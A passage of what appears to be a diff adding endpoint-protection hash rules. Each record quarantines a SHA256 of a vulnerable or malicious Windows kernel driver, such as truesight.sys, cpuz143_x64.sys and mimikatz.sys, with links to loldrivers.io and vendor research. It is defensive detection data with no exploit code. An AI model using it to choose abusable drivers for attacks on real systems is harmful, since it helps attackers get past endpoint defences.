"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.984476Z", + "creation_date": "2026-03-23T11:45:29.984478Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.984483Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"9f70169f9541c8f5b13d3ec1f3514cc4f2607d572ffb4c7e5a98be0856852dd8", + "comment": "Vulnerable Kernel Driver (aka inpoutx64.sys) [https://www.loldrivers.io/drivers/91ff1575-9ff2-46fd-8bfe-0bb3e3457b7f/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "12b4ea0e-3b93-585e-a69f-87dc66b5c24c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.830563Z", + "creation_date": "2026-03-23T11:45:30.830565Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.830571Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "342a4f20a79388bf0773e9ff1ce5146dd12d2daa8199ad9b9b7b8f509f4aae19", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "12ba60f2-bcb1-5f7f-81c1-80c615b11322", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.486610Z", + "creation_date": "2026-03-23T11:45:31.486613Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.486622Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ee2acea763a02c1ca721a87f3740ae2ba7c442841554f27dd215f66d61545c3f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "12c48090-aa7d-5781-b155-485c1e672cec", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.144682Z", + "creation_date": "2026-03-23T11:45:31.144685Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.144690Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "74acdbb7bd8674e46a3e72fc6bd5e069e7268707860a2593a969f0fce78bb056", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "12e32e43-ca65-5ea8-a8f2-f57f007371ba", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.819372Z", + "creation_date": "2026-03-23T11:45:31.819374Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.819379Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7820102b73f0b6adbed965be95c2880788c0bc84bfa743c50dcf48164616ae42", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "12eadc57-9c8f-5f83-a8f1-7b831ff796bb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.492073Z", + "creation_date": 
"2026-03-23T11:45:31.492075Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.492080Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7553c03169bb960696f1eb35db43c41a3a821c5eb05911642c95457f8c7e871f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "12f5ee20-d86d-5d1b-8324-332be0951370", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.820772Z", + "creation_date": "2026-03-23T11:45:30.820774Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.820780Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a97b404aae301048e0600693457c3320d33f395e9312938831bc5a0e808f2e67", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "13069652-2d29-58c3-a9fe-3cef038e622d", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.149424Z", + "creation_date": "2026-03-23T11:45:31.149427Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.149436Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4c9bde89e72111cb03fc68dd0a25cb76288bbb951fc2995b8cecc8b8abf6dec5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "130f1259-890b-575c-af2c-86de58df83e2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.980012Z", + "creation_date": "2026-03-23T11:45:29.980014Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:29.980019Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2dec76da0b361e4ed49a4015e67cefb0e6b812103d8ebf93b74016d99d9fcfad", + "comment": "Vulnerable Kernel Driver (aka Monitor_win10_x64.sys) [https://www.loldrivers.io/drivers/ca415ed5-b611-4840-bfb2-6e1eacac33d1/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1319bb43-9c2e-5ace-b293-cd20038a552e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.459186Z", + "creation_date": "2026-03-23T11:45:30.459189Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.459198Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "12656fc113b178fa3e6bfffc6473897766c44120082483eb8059ebff29b5d2df", + "comment": "Vulnerable Kernel Driver (aka netfilter2.sys) [https://www.loldrivers.io/drivers/5ad8a3b6-6d20-4c95-8fa7-9a507167ba3c/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "131ee303-f4c6-59e6-ad33-9d39ed4158ce", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", 
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.821556Z", + "creation_date": "2026-03-23T11:45:30.821559Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.821567Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "26ecd3cea139218120a9f168c8c0c3b856e0dd8fb2205c2a4bcb398f5f35d8dd", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "13311cd5-daed-5c3b-8f3f-5b18cdf66655", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.830113Z", + "creation_date": "2026-03-23T11:45:30.830115Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.830121Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "989b20aaaedb1724948b96d3873d86fae7889c3f3342a4bc87fe5dbd2a66ca4b", + "comment": "Vulnerable Adlice Software 
Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "133bb6d1-3a8b-59cf-9eaa-fac7e746bf47", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.154449Z", + "creation_date": "2026-03-23T11:45:31.154451Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.154456Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e2ab7d04d40166f22ba4557f119c92caeb43b6d6bdeba179f040cc85b7dcaeae", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "13514800-d2bf-5aac-bcd4-e970bce409ee", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", 
+ "last_update": "2026-03-23T11:45:30.462342Z", + "creation_date": "2026-03-23T11:45:30.462346Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.462354Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8210a89ba143d927384d7b2e6b3714d6ae9a9a384796ec6e306df38ca91e9c4e", + "comment": "Malicious Kernel Driver (aka mimikatz.sys) [https://www.loldrivers.io/drivers/14556074-b235-4378-b356-f58721629d72/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "136455b6-2ecf-57aa-855a-f81b9ab24af2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.979064Z", + "creation_date": "2026-03-23T11:45:29.979066Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.979072Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e75714f8e0ff45605f6fc7689a1a89c7dcd34aab66c6131c63fefaca584539cf", + "comment": "Vulnerable Kernel Driver (aka LHA.sys) [https://www.loldrivers.io/drivers/eb07ef7e-0402-48eb-8e06-8fb76eda5b84/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "13691976-af84-53f9-95e9-bb2b56d9702d", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.819226Z", + "creation_date": "2026-03-23T11:45:31.819229Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.819234Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "037feddbfda7bd71bd251f82cacac9ddbc7e11bc6d0c27a32d439b86c27907e8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "136a498b-416e-549e-ab18-a8d88dd0fdee", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.825614Z", + "creation_date": "2026-03-23T11:45:30.825617Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:30.825622Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "42a8d5d800c2f86648c2b852205354599ee5b3702fb58b5b86b6caa513690330", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "136d9937-07de-52eb-970a-4b8d627ef6d8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.458550Z", + "creation_date": "2026-03-23T11:45:30.458553Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.458562Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8ac341d36e1af8959de6410a976400ded8554f5ffb6a462a8080c38a0140f4d4", + "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1377f9e9-7926-50a3-8c26-b4a145a98ab8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": 
"critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.818577Z", + "creation_date": "2026-03-23T11:45:30.818579Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.818585Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c6db7f2750e7438196ec906cc9eba540ef49ceca6dbd981038cef1dc50662a73", + "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "137fc969-2b90-5ac8-9203-7686497ae954", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.488586Z", + "creation_date": "2026-03-23T11:45:31.488588Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.488594Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"5623f7e0ee46d7b957b837cca853cba4ccbd91c9ef614a063aa731f87f36c370", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1381530d-1548-583e-9b8f-6688a7a70576", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.155327Z", + "creation_date": "2026-03-23T11:45:31.155329Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.155335Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "eb7d84d567204a528cafc729897d3a6a2ebcceb6cca287c585335069deee24c5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "13917c01-d5fc-5581-9056-fece2e3731e2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.148078Z", + "creation_date": "2026-03-23T11:45:31.148080Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.148086Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ce44334bec3fe07364bae329eaccf6d39124b7d5ef1485f596b1b1c94f4f182d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1396e8d3-1fa5-5fcc-9c12-d3f24d2d5216", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.611464Z", + "creation_date": "2026-03-23T11:45:29.611466Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.611471Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "02fcbc5372c9bf31903376bde11d558ab7c7f13bde005120e24bdb1aef5d0134", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] 
[https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "13a5ba2c-788b-58b1-bfea-7fbf4ecad650", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.983902Z", + "creation_date": "2026-03-23T11:45:29.983904Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.983910Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dd4a1253d47de14ef83f1bc8b40816a86ccf90d1e624c5adf9203ae9d51d4097", + "comment": "Vulnerable Kernel Driver (aka iomem64.sys) [https://www.loldrivers.io/drivers/04d377f9-36e0-42a4-8d47-62232163dc68/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "13ad4e8d-4f6e-5cdf-aec9-5d5c764563b2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.827630Z", + "creation_date": "2026-03-23T11:45:30.827632Z", + "enabled": true, + 
